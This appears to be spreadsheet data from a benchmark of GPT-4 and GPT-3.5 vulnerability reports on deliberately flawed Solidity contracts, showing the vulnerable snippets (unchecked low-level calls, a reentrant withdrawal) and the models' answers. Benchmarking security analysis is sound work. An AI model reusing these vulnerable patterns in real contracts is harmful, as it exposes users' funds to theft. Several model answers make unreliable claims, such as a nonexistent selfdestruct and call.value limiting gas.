    if (msg.value != 1 ether) throw;
    players[tot] = Player(msg.sender, number);
    tot++;
    if (tot==2) andTheWinnerIs();
  }</t>
  </si>
  <si>
    <t>First, I'll read the content of the uploaded file to understand the code.
The code appears to be a Solidity contract for a game called "OddsAndEvens". Here's a brief breakdown:
1. **Contract Details:**
   - Contract Name: `OddsAndEvens`
   - Solidity Version: `^0.4.2`
2. **Structs:**
   - `Player`: This struct has two properties - `addr` (address of the player) and `number` (number chosen by the player).
3. **State Variables:**
   - `players`: An array of two players, which is public for debugging purposes.
   - `tot`: This variable seems to be a count of the number of players.
   - `owner`: The address of the contract owner.
4. **Functions:**
   - Constructor `OddsAndEvens()`: Sets the contract owner to the sender of the transaction.
   - `play(uint number)`: This function allows players to play the game. They need to send 1 ether to play. It updates the `players` array and increments the `tot` counter. If two players have played, it calls the `andTheWinnerIs()` function.
   - `andTheWinnerIs()`: This private function determines the winner by checking if the sum of the two numbers chosen by the players is odd or even. The winner receives 1.8 ether. Afterwards, the `players` array is reset and the `tot` counter is set back to 0.
   - `getProfit()`: This function allows the owner to withdraw the contract's balance.
Now, I will analyze the code for any vulnerabilities.
1. **Are there any vulnerabilities?** 
   Yes.
2. **how this vulnerability can be exploited :** 
   a. **Reentrancy Attack:** The function `andTheWinnerIs()` sends ether to an external address with the `.send()` method. If the recipient address is a malicious contract that implements a fallback function to call the `play()` function again, it can potentially drain the contract's balance. This is a classic reentrancy attack. The contract does not update its internal state before sending out ether, which makes it vulnerable.
   b. **Use of Deprecated Throw:** The contract uses `throw` for error handling, which is a deprecated way of handling errors in newer versions of Solidity. Instead, newer versions use `require`, `assert`, or `revert` for better gas usage and clarity.
   c. **Uninitialized State Variables:** The contract initializes the `owner` in the constructor but does not initialize the `tot` variable. Although Solidity initializes it to 0 by default, it's a best practice to explicitly initialize state variables for clarity.
   d. **Lack of Events:** The contract does not emit any events. Events are crucial in Ethereum contracts to log and notify external consumers of important contract actions.
   e. **Potential for Denial of Service:** The `play()` function requires an exact amount of 1 ether to be sent. However, if a user sends more than 1 ether and the transaction gets reverted, the ether would be locked in the contract, potentially causing a denial of service.
   f. **No Return Values in Functions:** Functions like `getProfit()` do not return any value to indicate success or failure, making it hard for external consumers to determine the outcome of the transaction.
   g. **No Check for Overflow:** The code does not check for potential overflow issues when increasing the `tot` counter.
These vulnerabilities need to be addressed to ensure the contract operates securely and reliably.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
   - **Reentrancy Attack**: The function `andTheWinnerIs()` is called after the update to the `players` array and incrementing `tot` but before the ether is actually withdrawn or transferred. If the `andTheWinnerIs()` function sends ether to an external contract, that contract can call `play()` again before the first call to `play()` finishes. This is a typical reentrancy vulnerability. 
   - **Uninitialized Storage**: The variable `tot` is used to index into the `players` array, but there's no check to ensure `tot` doesn't exceed the size of the array. If `tot` is not properly initialized or reset elsewhere in the contract, this could lead to overwriting storage locations.
   - **No Upper Bound Check**: There's no check to ensure that the `number` parameter is within a valid range.
   - **Use of `throw`**: The use of `throw` is outdated. In more recent Solidity versions, it's recommended to use `require()`, `assert()`, or `revert()` for error handling because they provide more informative error messages.
   - **Lack of Visibility Specifiers**: The function lacks visibility specifiers like `public` or `external`. In Solidity, functions are `public` by default, which might not be what the developer intended.
   - **Potential Race Condition**: If two transactions call `play()` at the same time when `tot` is 1, both might pass the `if (tot==2)` check before either has incremented `tot`, leading to unexpected behavior.
For a complete assessment, the entire contract including the `andTheWinnerIs()` function and other related state variables and functions would need to be reviewed.</t>
  </si>
  <si>
    <t>Alright, I'll start by reading the contents of the "odds_and_evens.sol" file and then provide an analysis based on the given format.
Let's break down the provided Solidity code:
1. The contract is named `OddsAndEvens`.
2. There's a `Player` struct that has an `address` and a `number`.
3. There's a public array `players` of size 2 to hold two players.
4. A counter `tot` keeps track of the number of players that have played.
5. There's an `owner` address.
6. The constructor sets the `owner` to the deployer of the contract.
7. The `play` function allows players to send 1 ether and a number to play. When two players have played, it calls the `andTheWinnerIs` function.
8. The `andTheWinnerIs` function determines the winner by checking the sum of the numbers provided by the two players. If it's even, the first player wins; otherwise, the second player does. The winner gets 1800 finney (1.8 ether). Players' data is then reset.
9. The `getProfit` function allows the owner to withdraw the contract's balance.
Analysis:
1. **Front-running Vulnerabilities**: Yes.
2. **how this vulnerability can be exploited **:
   - **Front-running the `play` function**: A malicious actor (M) could observe when a genuine player (G) tries to play by sending a transaction to the `play` function. Before G's transaction gets mined, M can send a transaction with a higher gas price to ensure that M's transaction gets mined first. By doing this, M can choose a number based on G's choice to guarantee a win, especially when M is the second player and can decide the outcome based on the first player's choice.
   - **Front-running the `getProfit` function**: Similarly, if a malicious actor observes the owner trying to withdraw the contract's balance, they could front-run this transaction, but this would require the malicious actor to have control of the owner's private key, which is a different kind of attack (not purely front-running). However, this function doesn't have a practical vulnerability in the context of front-running since it is specific to the owner.
Note: The code also uses older Solidity constructs like `throw` which are now deprecated in favor of `require`, `assert`, and `revert`. The version of Solidity used is also old (`^0.4.2`). It is recommended to use the latest version to benefit from the latest security improvements.</t>
  </si>
  <si>
    <t>1. Are there any front running vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
This code is a simple gambling game where a player can play by sending exactly 1 ether and choosing a number. Once two players have played, the function `andTheWinnerIs()` is presumably called to determine a winner.
The front running vulnerability in this code arises from the Ethereum blockchain's transaction ordering mechanism. Miners have the ability to order transactions as they see fit in a block. This means that if a player sees another player's transaction in the pending transaction pool and determines that they can take advantage by placing their own transaction, they can do so by offering a higher gas price. The miner would then prioritize the transaction with the higher gas price, potentially allowing the second player to act based on the knowledge of the first player's move.
For example, let's say Player A submits a transaction to play the game. Player B, a potential adversary, can monitor the pending transaction pool, see Player A's choice, and then make a decision based on that. Player B can submit their own transaction with a higher gas price to ensure it gets mined before Player A's transaction. This way, Player B has an advantage since they know Player A's choice before making their own.
While the code snippet doesn't show the implementation of `andTheWinnerIs()`, depending on how winners are chosen, front running can provide a significant advantage to an attacker.
In order to mitigate this vulnerability:
- Implement a commit-reveal scheme where players first commit to a choice (without revealing it) and then reveal it in a later phase.
- Use an off-chain solution or Layer 2 solution to handle game mechanics.
- Add randomness that neither player can predict or influence.</t>
  </si>
  <si>
    <t>false positive ratio = 0</t>
  </si>
  <si>
    <t>naive method answer</t>
  </si>
  <si>
    <t>location gpt 4 code interpreter</t>
  </si>
  <si>
    <t>respond by gpt 4 code interpreter</t>
  </si>
  <si>
    <t>location gpt 3.5 default</t>
  </si>
  <si>
    <t>respond by gpt 3.5 default model</t>
  </si>
  <si>
    <t>I will start by reading the provided Solidity code to analyze it for any vulnerabilities.
1. Are there any vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The vulnerability in this code is the use of the `.call()` method without any arguments on an arbitrary address. The `call()` function is a low-level function that allows arbitrary function calls to another contract, which can introduce various security risks, especially reentrancy attacks.
The line with the vulnerability is:
```solidity
a.call();
```
3. The business impact of these vulnerabilities in one sentence:
The `callAddress` function leads to potential reentrancy attacks and unexpected behavior in called contracts.
4. The potential solutions to these vulnerabilities:
- Avoid using low-level calls such as `.call()`. Instead, prefer higher-level functions like `.transfer()` or `.send()`.
- If you need to use a low-level call, make sure to check the return value to handle any potential failures.
- Implement checks to ensure that the external call cannot call back into the contract (reentrancy guard).
- Make sure to handle the gas stipends correctly to avoid running out of gas during the call.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x0cbe050f75bc8f8c2d6c0d249fea125fd6e1acc9.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function callAddress(address a) {
        a.call();
    }</t>
  </si>
  <si>
    <t>Alright, I will first read the provided Solidity code to understand its structure and functionality. After that, I'll analyze it for potential smart contract vulnerabilities.
Based on the provided Solidity code, here's the breakdown:
1. The contract is named "demo".
2. It has a function called `transfer` which appears to be designed to facilitate a batch transfer of tokens from an address `from` to multiple addresses `_tos` with respective amounts `v`.
3. Within the `transfer` function:
    - It requires the length of `_tos` to be greater than zero.
    - It computes the method ID `id` for the `transferFrom` function by hashing the signature.
    - It then loops through the `_tos` addresses and invokes the `transferFrom` method on the contract with address `caddress` using the `call` method.
Now, I will analyze the code for potential vulnerabilities.
1. Are there any smart bugs vulnerabilities? 
**Answer**: Yes.
2. how this vulnerability can be exploited :
- **Reentrancy Vulnerability**: The `transfer` function uses the `call` method to invoke another contract's function. This opens up the possibility for a reentrancy attack if the called contract has malicious code. The attacker could potentially call back into the `demo` contract before the original function call is complete.
- **Unchecked Return Value**: The return value of the `call` method is not checked. If the call fails for any reason (e.g., the called contract runs out of gas, throws an exception, or simply does not have a `transferFrom` method), the `demo` contract will not be aware of it and will continue executing.
3. The business impact of these vulnerabilities in one sentence:
- **Reentrancy Vulnerability**: Allows an attacker to re-enter and potentially drain funds from the contract.
- **Unchecked Return Value**: The `transfer` function may believe transfers were successful when they actually failed.
4. The potential solutions to these vulnerabilities:
- **Reentrancy Vulnerability**: 
  - Use the checks-effects-interactions pattern: Always perform external function calls at the end, after updating any internal states.
  - Implement a reentrancy guard, such as a mutex, to prevent recursive calls.
- **Unchecked Return Value**: 
  - Check the return value of the `call` method and handle failures appropriately. If the `call` fails, the function should revert or take other appropriate actions.
Lines with vulnerabilities:
- `caddress.call(id,from,_tos[i],v[i]);`: This line is vulnerable to both reentrancy and unchecked return value issues.</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities.
2. how this vulnerability can be exploited :
   The vulnerability here is that the code is using the low-level `call()` function to call a contract. This function is unsafe because it forwards all available gas and opens up the possibility for re-entrancy attacks. In a re-entrancy attack, the called contract could call back into the calling contract before the first call is finished. This could potentially lead to unexpected behavior if the calling contract's state is not yet finalized.
3. The business impact of these vulnerabilities in one sentence: The `callAddress` function leads to potential re-entrancy attacks which could lead to loss of funds or manipulation of contract state.
4. The potential solutions of these vulnerabilities: 
   - Use `call()` with caution, and be aware of the risks associated with re-entrancy attacks.
   - To prevent re-entrancy, you could use a mutex or re-entrancy guard that locks the contract state while a function is being executed.
   - To limit the amount of gas forwarded, consider using `call.value()()` instead of `call()`.
   - Avoid state changes after the external call.
   - If possible, use higher-level functions such as `transfer()` or `send()`, which are safer as they do not forward all available gas and do not allow re-entrancy.
   - In general, the best practice is to perform all external calls at the end of your function, after any changes to state variables. This is known as the "checks-effects-interactions" pattern.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
    - **Unchecked Low-Level Calls**: The line `caddress.call(id,from,_tos[i],v[i]);` is a direct low-level call to another contract without checking its return value. If the call fails, the loop will continue to the next iteration without any indication or reversion.
    - **Mismatched Arrays**: The function accepts arrays `_tos` and `v` without checking if their lengths are the same. This could lead to unexpected behavior if the lengths differ.
    - **No Authentication**: There's no check in the function to ensure that the caller is authorized to initiate the transfers.
3. The business impact of these vulnerabilities in one sentence:
   - Unchecked low-level call can lead to silent failures in transferring tokens.
   - Mismatched arrays can lead to unpredictable transfers or failures.
   - Lack of authentication allows any user to potentially make unauthorized transfers.
4. The potential solutions to these vulnerabilities:
   - **Unchecked Low-Level Calls**: Use the `.call.value(...)(...)` syntax and check the return value to ensure the call was successful. If it wasn't, revert the transaction or handle the error appropriately.
     ```solidity
     (bool success, ) = caddress.call(abi.encodeWithSelector(id, from, _tos[i], v[i]));
     require(success, "Transfer failed");
     ```
   - **Mismatched Arrays**: Add a `require` statement to check that the lengths of `_tos` and `v` are the same.
     ```solidity
     require(_tos.length == v.length, "Mismatched array lengths");
     ```
   - **No Authentication**: Depending on the desired behavior, implement an authentication mechanism. If only the `from` address should be able to initiate the transfer, you can add:
     ```solidity
     require(msg.sender == from, "Not authorized");
     ```
     Alternatively, if there's a specific set of addresses (like administrators or owners) that should be able to call the function, use a modifier to restrict access.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function transfer(address from,address caddress,address[] _tos,uint[] v)public returns (bool){
        require(_tos.length &gt; 0);
        bytes4 id=bytes4(keccak256("transferFrom(address,address,uint256)"));
        for(uint i=0;i&lt;_tos.length;i++){
            caddress.call(id,from,_tos[i],v[i]);
        }
        return true;
    }</t>
  </si>
  <si>
    <t>1. Is there any vulnerabilities? 
Yes.
2. Explain in details how this vulnerability can be exploited:
The main vulnerability in this code is related to the use of the low-level `.call()` function. This function is used to call another contract and it's considered dangerous because it forwards all remaining gas and opens up the ability for a called contract to perform operations that the calling contract may not have anticipated. For instance, the called contract could trigger a fallback function that re-enters the calling contract, leading to potential re-entrancy attacks.
Moreover, this contract does not check the return value of `caddress.call(id,from,_tos[i],v[i])`. If this call fails for any reason, the contract will still return `true`, which could mislead users into thinking the transaction was successful when it actually failed.
3. The business impact of this vulnerabilities in one sentence:
The `transfer` function leads to potential re-entrancy attacks and incorrect reporting of transaction success, potentially causing loss of funds and misleading users.
4. The potential solutions of this vulnerabilities:
- One possible solution is to replace the low-level `.call()` function with the Solidity provided `transferFrom` function directly, which would be much safer and also check the return value of the `transferFrom` function. If the `transferFrom` function call fails, the contract should revert the transaction or handle the error properly, rather than just proceeding and returning `true`.
- To prevent re-entrancy attacks, you can use a pattern like Checks-Effects-Interactions where you perform any external calls at the end of your function, after you've made changes to your contract's state. Or you could use a reentrancy guard, a commonly used pattern for preventing re-entrancy attacks.
- It's also recommended to use OpenZeppelin's SafeERC20 library which provides `safeTransferFrom` function that automatically checks the return value of `transferFrom` function call. 
Here is an example of how you could modify the function to address these issues:
```solidity
import "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";
function transfer(address from, address caddress, address[] memory _tos, uint[] memory v) public returns (bool) {
    require(_tos.length &gt; 0);
    IERC20 token = IERC20(caddress);
    for(uint i = 0; i &lt; _tos.length; i++) {
        SafeERC20.safeTransferFrom(token, from, _tos[i], v[i]);
    }
    return true;
}
```
In this modified function, I'm using OpenZeppelin's SafeERC20 library to safely transfer tokens from one address to another. This function will throw an error and revert the transaction if the `transferFrom` call fails, which prevents the contract from misleadingly returning `true` when the transaction was not successful.</t>
  </si>
  <si>
    <t>I will begin by reading the content of the provided Solidity file and examining the code for potential vulnerabilities.
I've extracted the content of the provided Solidity file. Let's analyze the code:
1. The code defines three contracts: `Ownable`, `Token`, and `TokenBank`.
2. The `Ownable` contract provides basic functionality to change ownership.
3. The `Token` contract extends `Ownable` and provides a method to withdraw tokens.
4. The `TokenBank` contract extends `Token` and provides functionalities to deposit and withdraw Ether.
Vulnerability Analysis:
1. **Are there any vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   a. **Fallback Function with External Calls**: The fallback function in the `TokenBank` contract directly calls the `Deposit` function, which contains external calls. If the contract receives Ether without a specified function call, it will trigger the fallback function. This pattern is discouraged because it can make the contract susceptible to reentrancy attacks.
   b. **Unprotected SelfDestruct**: There isn't a direct `selfdestruct` in the code, but the use of the `.call()` method, especially in the `WithdrawToken` function of the `Token` contract and the `WithdrawToHolder` function of the `TokenBank` contract, is dangerous. The `.call()` method can execute arbitrary code, including potentially malicious code if the target address is a contract with a malicious fallback function. This can result in unintended behaviors, including the potential for reentrancy attacks.
   c. **Potential Underflow in `WithdrawToHolder`**: In the `WithdrawToHolder` function, the line `Holders[_addr]-=_wei;` can cause an underflow if `_wei` is greater than `Holders[_addr]`. Although there's a condition check before this, the condition only checks for the sender's holdings and not the `_addr` holdings. 
   d. **Lack of Event Logging**: Smart contract interactions are often tracked using events. This contract does not emit any events, making it difficult to track interactions on the blockchain.
   e. **Use of `sha3` for function selectors in `WithdrawToken` function**: The line `token.call(bytes4(sha3("transfer(address,uint256)")),to,amount);` uses the old `sha3` function for generating function selectors. This can be problematic and might not work with newer contracts that use the `keccak256` hashing function.
   f. **Arbitrary Token Withdrawal**: The `WithdrawToken` function allows the contract owner to withdraw any ERC20 token from the contract to any address. If tokens are mistakenly sent to the contract, they can be taken by the owner.
   g. **Ownership Transfer Does Not Emit an Event**: The `Ownable` contract allows for changing ownership, but it does not emit any events when ownership is changed. This makes it harder to track ownership changes.
These are some of the prominent issues. There might be other, more subtle vulnerabilities, or considerations based on the specific usage and context of the contract. Proper testing and auditing, ideally by specialized firms, are recommended before deploying any smart contract on the mainnet.</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code. Once I've analyzed it, I'll respond in the format you provided.
The provided Solidity code contains several contracts. Here's a brief overview of each:
1. **Ownable**: This contract implements basic authorization control functions, simplifying the implementation of user permissions. It allows for the transfer of contract ownership.
   - Variables:
     - `newOwner`: Temporary storage for the new owner's address during the ownership transfer process.
     - `owner`: The address of the current owner.
   - Functions:
     - `changeOwner(address addr)`: Sets the new owner. Can only be called by the current owner.
     - `confirmOwner()`: Confirms the new owner. Can only be called by the new owner.
   - Modifiers:
     - `onlyOwner`: Ensures that the caller is the current owner.
2. **Token**: This contract extends `Ownable` and provides a function to withdraw tokens.
   - Functions:
     - `WithdrawToken(address token, uint256 amount, address to)`: Calls the `transfer` function on another contract (token) to transfer a specified amount of tokens to a given address. Can only be called by the owner.
3. **TokenBank**: This contract extends `Token` and provides functions for depositing Ether, withdrawing tokens to a holder, and withdrawing Ether to a holder.
   - Variables:
     - `MinDeposit`: Minimum deposit required.
     - `Holders`: A mapping to track the balance of each address.
   - Functions:
     - `initTokenBank()`: Initializes the `TokenBank` with an owner and sets the `MinDeposit` to 1 Ether.
     - `Deposit()`: Allows users to deposit Ether, as long as it's greater than `MinDeposit`.
     - `WitdrawTokenToHolder(address _to, address _token, uint _amount)`: Withdraws tokens to a specified holder. Can only be called by the owner.
     - `WithdrawToHolder(address _addr, uint _wei)`: Withdraws Ether to a specified address. Can only be called by the owner.
Now, let's analyze the code for potential vulnerabilities.
1. Are there any unchecked low-level vulnerabilities?
**Answer:** Yes.
2. how this vulnerability can be exploited :
a. **Unchecked Return Values**: 
- The use of low-level calls such as `.call()` can be prone to errors, as they return a boolean indicating success or failure, which is not being checked in this contract.
   - In the `Token` contract, the `WithdrawToken` function uses `token.call(...)`, but it does not check the return value. This means the function might think it has succeeded even if the token transfer fails.
   - In the `TokenBank` contract, the `WithdrawToHolder` function uses `_addr.call.value(_wei)()`, but it does not check the return value. This means the function might think it has succeeded even if the Ether transfer fails.
b. **Reentrancy Attack**:
- The `WithdrawToHolder` function in the `TokenBank` contract is vulnerable to a reentrancy attack. The function first sends Ether with `_addr.call.value(_wei)()` and then updates the state with `Holders[_addr]-=_wei;`. An attacker can use the fallback function to call `WithdrawToHolder` again before the state is updated, allowing them to withdraw more Ether than they should.
c. **Potential Ownership Hijacking**:
- The `Ownable` contract allows any address to be set as the `newOwner` without any checks. If the current owner doesn't notice and confirm the change in time, the ownership can be hijacked.
d. **Fallback Function Misuse**:
- The fallback function in the `TokenBank` contract directly calls the `Deposit` function. If the `Deposit` function were to fail or throw an exception, it would also cause the fallback function to fail, potentially locking up Ether sent to the contract.
e. **Use of SHA3 for Function Signature**:
- The `Token` contract uses `sha3("transfer(address,uint256)")` to generate the function signature for the `transfer` function. In newer versions of Solidity, `keccak256` is recommended over `sha3`.
To mitigate these vulnerabilities:
- Always check the return value of `.call()`.
- Use the Checks-Effects-Interactions pattern to prevent reentrancy attacks.
- Add checks and events to monitor and confirm ownership changes.
- Simplify the fallback function to avoid potential issues.
- Use `keccak256` for generating function signatures.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol</t>
  </si>
  <si>
    <t>function WithdrawToken(address token, uint256 amount,address to)
    public 
    onlyOwner
    {
        token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 
    }
}</t>
  </si>
  <si>
    <t>1. Are there any unchecked low-level vulnerabilities? 
**Yes.**
2. how this vulnerability can be exploited :
The code provided uses a low-level `.call()` function to invoke the `transfer` function of a given token. This introduces a couple of significant vulnerabilities:
a. **Unchecked Return Value**:
The `.call()` method returns a boolean indicating whether the call was successful or not. However, the return value is not being checked in this code. If the `transfer` function of the token being called were to fail for any reason, this would not be detected and handled.
b. **Reentrancy Vulnerability**:
The use of the `.call()` method can lead to reentrancy attacks if the called contract contains malicious code. When `.call()` is used, the called contract can execute arbitrary code and potentially call back into the calling contract before the initial call completes. This can lead to unexpected behaviors, including the draining of funds.
c. **Deprecation of `sha3`**:
The `sha3` function has been deprecated in favor of `keccak256` in Solidity. Using deprecated functions can introduce unexpected behaviors and vulnerabilities.
For safer token transfers, it's better to use the Solidity high-level functions or the recommended ERC20 interface methods rather than resorting to low-level calls.</t>
  </si>
  <si>
    <t>function WithdrawToHolder(address _addr, uint _wei) 
    public
    onlyOwner
    payable
    {
        if(Holders[msg.sender]&gt;0)
        {
            if(Holders[_addr]&gt;=_wei)
            {
                _addr.call.value(_wei);
                Holders[_addr]-=_wei;
            }
        }
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The code has a potential reentrancy vulnerability due to the unsafe use of `.call.value()`. This function sends ether to the `_addr` address without any gas limit. If the `_addr` is a malicious smart contract, it can use its fallback function to re-enter the `WithdrawToHolder` function before the `Holders[_addr] -= _wei;` line is executed. This can lead to repeated unauthorized withdrawals.
Here is a potential sequence of events exploiting the reentrancy:
- A malicious smart contract, with a known balance in `Holders`, calls `WithdrawToHolder`.
- The function proceeds to the `_addr.call.value(_wei)` line and sends `_wei` amount of ether to the malicious contract.
- The malicious contract's fallback function is triggered and it calls `WithdrawToHolder` again.
- Since the balance of `Holders[_addr]` is not yet updated, it can withdraw the same amount again.
- This can be repeated as many times as the gas limit allows, potentially draining all funds from the contract.
To fix this vulnerability, you should always update the contract's state before transferring any ether or tokens. In this case, the line `Holders[_addr] -= _wei;` should come before the `_addr.call.value(_wei);` line.</t>
  </si>
  <si>
    <t>"1. Yes.
2. how this vulnerability can be exploited :
The code you provided is a Solidity function for a smart contract, and it contains at least two potential vulnerabilities:
a. **Reentrancy Attack**: The function uses the `.call.value(_wei)()` method to send ether. This method is susceptible to reentrancy attacks. If `_addr` is a malicious contract that has a fallback function, it can call `WithdrawToHolder` again before the state (in this case, `Holders[_addr]`) is updated. This allows the attacker to drain more funds than they are supposed to.
b. **Unchecked Return Value**: The `.call.value(_wei)()` method returns a boolean value indicating success or failure. This return value is not checked in the function, which can lead to unexpected behaviors. If the call fails, the `Holders[_addr]` balance is still decreased, potentially leading to a loss of funds in the contract.
A safer approach would involve using the `address.transfer()` or `address.send()` methods for sending ether or using the Checks-Effects-Interactions pattern to mitigate reentrancy attacks."</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the provided Solidity code. Let's first read the content of the file.
I've reviewed the provided Solidity code. Here's a breakdown:
The code defines three contracts:
1. `Ownable`: Provides basic functionality for changing and confirming contract ownership.
2. `Token`: Allows the contract owner to withdraw tokens to a specified address.
3. `TokenBank`: Handles deposits and withdrawals of Ether and tokens.
Now, let's analyze the vulnerabilities:
### 1. Are there any vulnerabilities? 
Yes.
### 2. how this vulnerability can be exploited :
1. **Fallback Function Reentrancy Vulnerability**:
    - In the `TokenBank` contract, the `WithdrawToHolder` function sends ether to an external address using the `.call.value()` method without decreasing the balance first, which is vulnerable to reentrancy attacks. A malicious actor could create a fallback function in their contract to repeatedly call `WithdrawToHolder` before the balance is deducted, draining the contract's ether.
2. **Use of the `sha3` and `call` functions in a potentially unsafe manner**:
    - In the `Token` contract, the `WithdrawToken` function uses the `sha3` function to calculate the method signature for the `transfer` function and then calls this method on the provided token contract. This method of calling other contracts is outdated and can be vulnerable, especially if the target contract's `transfer` function has a different method signature or if it's maliciously crafted.
3. **Missing function visibility**:
    - The `onlyOwner` modifier in the `Ownable` contract lacks explicit visibility, which can lead to unexpected behavior.
4. **Possible Front-Running**:
    - There is no mechanism to prevent front-running attacks, especially in functions that involve value transfers or important state changes.
5. **Misleading Contract Initialization**:
    - The `TokenBank` contract contains an `initTokenBank` function that sets the contract's owner and `MinDeposit`. However, this approach can be misleading as the typical convention is to set these values in the contract's constructor. Using a separate initialization function can lead to potential misuse or oversight.
These are some of the primary vulnerabilities and concerns in the provided contract. It's essential to address these issues before deploying the contract on a mainnet.</t>
  </si>
  <si>
    <t>Alright, let's begin by examining the contents of the uploaded Solidity contract file.
Here's a breakdown of the contract's structure:
1. `Ownable`: A basic contract that provides basic authorization control functions, simplifying the implementation of user permissions.
   - `newOwner`: Holds the address of a potential new owner.
   - `owner`: The address of the current owner.
   - `changeOwner`: Allows the current owner to set a new owner.
   - `confirmOwner`: Allows the new owner to confirm their ownership.
   - `onlyOwner`: A modifier that restricts function access to only the owner.
2. `Token`: A contract that inherits from `Ownable`. This contract has a function to withdraw tokens.
   - `WithdrawToken`: Allows the owner to call the transfer function on another contract (token) to transfer tokens.
3. `TokenBank`: A contract that inherits from `Token`. This contract serves as a bank for tokens and ether.
   - `MinDeposit`: Minimum amount of ether for deposit.
   - `Holders`: A mapping of addresses and the amount of ether they hold.
   - `initTokenBank`: Initializes the bank's settings.
   - `Deposit`: Allows an address to deposit ether.
   - `WitdrawTokenToHolder`: Allows the owner to withdraw tokens to a holder.
   - `WithdrawToHolder`: Allows the owner to withdraw ether to a holder.
   - `Bal`: Returns the balance of the contract.
Let's analyze the contract for unchecked low-level vulnerabilities:
1. **Reentrancy**: The contract uses `.call()` for both token transfers and ether withdrawals. This is a known pattern that can lead to reentrancy attacks.
2. **Fallback Function**: The fallback function is present and redirects to the `Deposit()` function. This design can lead to unintended behavior.
3. **Gas Limit**: The contract uses the `.call()` method without setting a gas limit. This can be problematic.
4. **Overwriting Ownership**: The owner variable is declared twice, once in the `Ownable` contract and once in the `Token` contract.
5. **Arbitrary Function Call**: The `WithdrawToken` function uses the `.call()` method to make an arbitrary function call, which can be risky.
6. **Underflow/Overflow**: There is no use of SafeMath or any other protection against underflow or overflow in arithmetic operations.
Let's address these findings accordingly.
1. Are there any unchecked low level vulnerabilities? 
**Yes**
2. how this vulnerability can be exploited :
   - **Reentrancy**: The use of `.call()` without adequately mitigating against reentrancy can lead to potential attacks where a malicious contract could repeatedly call the contract to drain funds.
   - **Fallback Function**: The contract's fallback function directly calls the `Deposit()` function. A sender can inadvertently trigger deposits without intending to.
   - **Gas Limit**: The absence of a specified gas limit in `.call()` methods can allow a malicious contract to consume all the gas provided, causing the transaction to fail.
   - **Overwriting Ownership**: The `owner` variable is declared in both the `Ownable` and `Token` contracts, which can lead to confusion and potential vulnerabilities if the `Token` contract's owner variable is manipulated.
   - **Arbitrary Function Call**: In the `WithdrawToken` function, the contract creates a function signature using `sha3` and then uses `.call()` to invoke this function on another contract. If a malicious contract mimics the expected function signature, it can trigger unintended behavior.
   - **Underflow/Overflow**: Without safeguards like SafeMath, arithmetic operations in the contract (e.g., `Holders[_addr]-=_wei;`) can lead to integer underflows or overflows, resulting in incorrect balances or unexpected behavior.</t>
  </si>
  <si>
    <t>dataset/unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function WithdrawToken(address token, uint256 amount,address to)
    public 
    onlyOwner
    {
        token.call(bytes4(sha3("transfer(address,uint256)")),to,amount); 
    }
}
</t>
  </si>
  <si>
    <t>1. Yes, there are vulnerabilities in this code.
2. how this vulnerability can be exploited :
   - **Reentrancy Attack**: The function `WithdrawToHolder` is prone to a reentrancy attack because it calls an external contract (`_addr.call.value(_wei)`) before it updates the state (`Holders[_addr] -= _wei`). A malicious contract could in theory reenter the `WithdrawToHolder` function before the state has been updated, allowing the attacker to drain more funds than they should be able to.
   - **Unchecked Return Value**: The return value of the `.call.value(_wei)` is not checked. If the transfer fails for any reason (e.g., the recipient contract throws an exception), this failure will be silently ignored, which could lead to funds being locked in the contract.
3. The business impact of these vulnerabilities in one sentence: The `WithdrawToHolder` function leads to potential asset loss due to reentrancy attacks and unexpected behavior due to unchecked return values.
4. The potential solutions of these vulnerabilities:
   - **Reentrancy Attack**: To fix the reentrancy vulnerability, the state should be updated before calling the external contract. This is known as the "Checks-Effects-Interactions" pattern. Here is the corrected code:
     ```solidity
     function WithdrawToHolder(address _addr, uint _wei) 
     public
     onlyOwner
     payable
     {
         if(Holders[msg.sender]&gt;0)
         {
             if(Holders[_addr]&gt;=_wei)
             {
                 Holders[_addr] -= _wei;  // update state first
                 (bool success, ) = _addr.call{value: _wei}("");  // then interact with external contract
                 require(success, "Transfer failed.");  // check return value
             }
         }
     }
     ```
   - **Unchecked Return Value**: The return value of the `.call.value(_wei)` should be checked to ensure that the transfer was successful. If not, the function should revert. This can be done by adding `require(success, "Transfer failed.");` after the `.call.value(_wei)` line, as shown in the corrected code above.</t>
  </si>
  <si>
    <t>1. Yes.
2. how this vulnerability can be exploited :
The provided code has a potential unchecked low-level vulnerability called "Unchecked Return Value". Here's the detailed explanation:
- The `token.call` method is a low-level call to another contract. In Solidity, a low-level call returns `false` if it throws an exception (e.g., out-of-gas) and does not revert the state.
- In the provided code, the return value of the `token.call` is unchecked. Therefore, if the call to the `transfer` function fails for some reason (e.g., due to insufficient balance, or the called contract does not have a `transfer` function with the specified signature), the `WithdrawToken` function will silently continue without any error or reversion, potentially masking a failed transfer.
To exploit this, a malicious actor could trick the contract owner into thinking a transfer was successful when it actually failed. This can lead to loss of funds or other unintended consequences.
A safer approach would be to check the return value of the `token.call` and revert the transaction if it fails. For example:
```solidity
bool success;
(success, ) = token.call(bytes4(sha3("transfer(address,uint256)")), to, amount);
require(success, "Transfer failed");
```
Additionally, it's worth mentioning that using the `sha3` function for hashing is now considered deprecated in Solidity. The newer `keccak256` should be used instead.</t>
  </si>
  <si>
    <t xml:space="preserve">    function WithdrawToHolder(address _addr, uint _wei) 
    public
    onlyOwner
